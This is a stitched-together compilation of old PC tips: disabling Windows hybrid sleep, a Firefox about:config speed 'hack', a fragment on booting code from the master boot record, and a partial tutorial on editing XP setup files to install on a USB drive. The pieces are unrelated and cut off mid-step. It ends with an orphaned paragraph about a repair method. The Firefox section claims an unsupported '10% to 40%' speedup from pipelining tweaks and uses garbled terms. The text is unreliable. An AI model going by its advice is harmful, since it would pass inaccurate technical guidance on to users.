Step 3: You are now redirected to the “Change settings for the plan” page. Now click on the “Change advanced power settings” option and under the “Advanced settings” tab, expand the button next to the “Sleep” tree followed by the expansion of the “Allow hybrid sleep” option. Select “Off” from the drop-down list as the value for both “On battery” and “Plugged in” options in your laptops. Click Ok and save the changes

Hack Firefox to Make it Faster!

 1. Open the Firefox "config" page: click into the Firefox address location bar, and type about:config, press Enter.

   2. The "Config" file will appear in the Firefox browser as a page with hundreds of lines of code in it. Now, we start by enabling some advanced tabbed options:

   3. Locate the line browser.tabs.showSingleWindowModePrefs . (tip: press "b" on your keyboard to quick scroll).

   4. Double click on browser.tabs.showSingleWindowModePrefs . This will set its toggle to "true". Now your advanced and enhanced tabbing should be set.

      Note: in Firefox version 1.5, the command line is singlewindow.openintabs.
   5. Next: we will increase the "pipeline" RAM ability for Firefox to accomodate more packet transfer. In the same config document, scroll down to the line that says network.http.pipelining . Double click this line to set it to "true".

   6. Lastly, we will increase the maximum pipeline requests to 100. Find the line that says network.http.pipelining.maxrequests. Double click on it, and a dialog box will pop up. Change the setting from 4 to 100.

   7. No need to save this file. Simply close and restart Firefox, and you should see an immediate 10% to 40% increase in web page transfer speed, and faster opening of your tabbed windows! Enjoy!

How to run Program without OS

You need boot code that would boot the computer up after POST (after finding your bootable media e.g floppy, HDD, CD) and the code would have to go into mbr = master boot record.
Now depending on whether you want to execute a file or code sitting on the device at a certain location you have to write the code accordingly.

e.g you want to execute your written program from a memory location (which is easier) then you have to define in mbr

Install XP in external HDD....

I am posting this topic after I checked for a solution to this problem and didn't find one in this forum. It was of great use to me. I hope it is useful to you. My requirement was to dual boot XP and VISTA as only XP could run old simulation softwares and VISTA was factory loaded and better. With this you can create an XP bootable CD which can be installed in an USB HDD. XP can not be normally installed in an USB HDD as it resets the USB drives while loading. This XP installation can be used to boot from only that computer where it was installed. This may prove to be helpful when you have a branded PC or Laptop with factory installed recovery and OS and dont want to mess with it. So here is how to do it:
Requirements:
•An existing Windows install for carrying out the steps in this tutorial
•A USB2-compliant Hard disk drive
•An untweaked Windows XP CD (tested against SP2)
•A registered version of WinISO (or any other software that allows direct editing of ISO files)
•The Microsoft CAB SDK      http://download.microsoft.com/download/platformsdk/cab/2.0/w98nt42kmexp/en-us/Cabsdk.exe [nofollow]
•A CD-burning software that can handle ISO files.
How To:

Summary:
We will dump the contents of your original Windows XP CD , extract a few files from the Image using ISO modification software, edit the files, and put the modified versions back on the ISO. The resulting ISO image is burnt back onto a CD media, and can then directly be used to install Windows on your USB drive.
I am also covering a few pitfalls that happened to me, in hope they will save you a bit of time.

1) Does your computer support booting from USB?
Usually, if its an option in your BIOS boot sequence menu, the answer to this is yes. If its not there, look for BIOS updates. If you are not sure, proceed and see what happens ;-)

2) Sorting out the "Bootability" of your USB-Drive
Connect your USB drive to your computer, directly, without a Hub. Then, shut down your computer, disconnect any other hard disk drives from it, and insert your untweaked Windows XP CD into the drive. Start the installation, and proceed to the section where you are allowed to pick a hard drive. If it goes beyond the partition selection, your drive is already fine for booting Windows XP. If not, you may get an error like "Windows is unable to find your drive, partition, data etc bla".To solve it you need to "properly" format the drive. Reboot into your normal Windows,and format your HDD completely. I chose NTFS format. After this, my drives are recognized as valid installation devices by the Windows XP installer.

3) Dumping the original Windows CD into an ISO File
Pretty easy one. Simply open WinISO, and select Actions -> Make ISO from CDROM, and save your CD image.

4) Extracting the files we need to work on
After the CD dump is done, close and reopen WinISO. Then, open the ISO file you just created using File -> Open.
Now, click the I386 folder, and select the following files (Ctrl key to multi-select)
•TXTSETUP.SIF
•DOSNET.INF
•USB.IN_
•USBPORT.IN_
•USBSTOR.IN_
Select Actions -> Extract and put the resulting files into some folder to work on them.

5) Unpacking IN_ files
Use the Cab SDK (from the command line) for extracting the contents of the .IN_ files. Each of them contains exactly one .inf file. If you are unsure how to use the Cab SDK, here is an example command line: "cabarc x USBSTOR.IN_" . You should end up with three new files in the folder, called:
•usb.inf
•usbport.inf
•usbstor.inf
You can now delete the .IN_ files.

6) Editing the files
This is the main job. i ll also try to explain a bit whats happening. Use a simple Texteditor like Notepad.

    6-A) TXTSETUP.SIF
    This file is loaded on the initial install step by the Windows XP CD      installer. In this file, we will change the way Windows treats USB devices during system setup -- the default is to only treat them as input devices during installation -- we will change this to include mass storage driver  support (which needs to be loaded into the installer much earlier in order to work).
First, move the following entries from [InputDevicesSupport.Load] to the [BootBusExtenders.Load] section , as shown here

You can use this method as often as you like when you need to repair something that had gotten corrupted and you don't want to do a clean install.

This is better than doing a windows repair install from the cd because doing that can cause changes to settings and even make it so you can't get updates anymore from microsoft update site because of the 'silent install' they did a year or so ago (unless you rereg some dll files).
